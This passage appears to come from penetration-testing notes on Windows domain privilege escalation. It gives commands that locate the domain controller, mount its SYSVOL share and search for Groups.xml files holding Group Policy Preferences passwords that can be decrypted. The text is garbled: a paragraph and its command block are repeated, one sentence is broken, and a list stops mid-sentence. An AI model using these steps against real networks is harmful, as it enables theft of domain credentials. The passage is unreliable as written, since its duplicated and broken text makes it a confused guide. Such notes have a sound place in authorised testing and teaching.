If the machine belongs to a domain and your user has access to **System Volume Information** there might be some sensitive files there.
First we need to map/mount that drive. In order to do that we need to know the IP-address of the domain controller. We can just look in the envronment-variables
```
# Output environemtn-variables
set
# Look for the following:
LOGONSERVER=\\NAMEOFSERVER
USERDNSDOMAIN=WHATEVER.LOCAL
# Look up ip-addres
nslookup nameofserver.whatever.local
# It will output something like this
Address: 192.168.1.101
```
gpp-decrypt
Look for the file **Groups.xml**. It might be encrypted the password. But the encryption.key can be found on windows homepage. Other interesting files here might be
If the machine belongs to a domain and your user has access to **System Volume Information** there might be some sensitive files there.
First we need to map/mount that drive. In order to do that we need to know the IP-address of the domain controller. We can just look in the envronment-variables
```
# Output environemtn-variables
set
# Look for the following:
LOGONSERVER=\\NAMEOFSERVER
USERDNSDOMAIN=WHATEVER.LOCAL
# Look up ip-addres
nslookup nameofserver.whatever.local
# It will output something like this
Address: 192.168.1.101
# Now we mount it
net use z: \\192.168.1.101\SYSVOL
# And enter it
z:
# Now we search for the groups.xml file
dir Groups.xml /s
```
If we find the file with a password in it, we can decrypt it like this in Kali
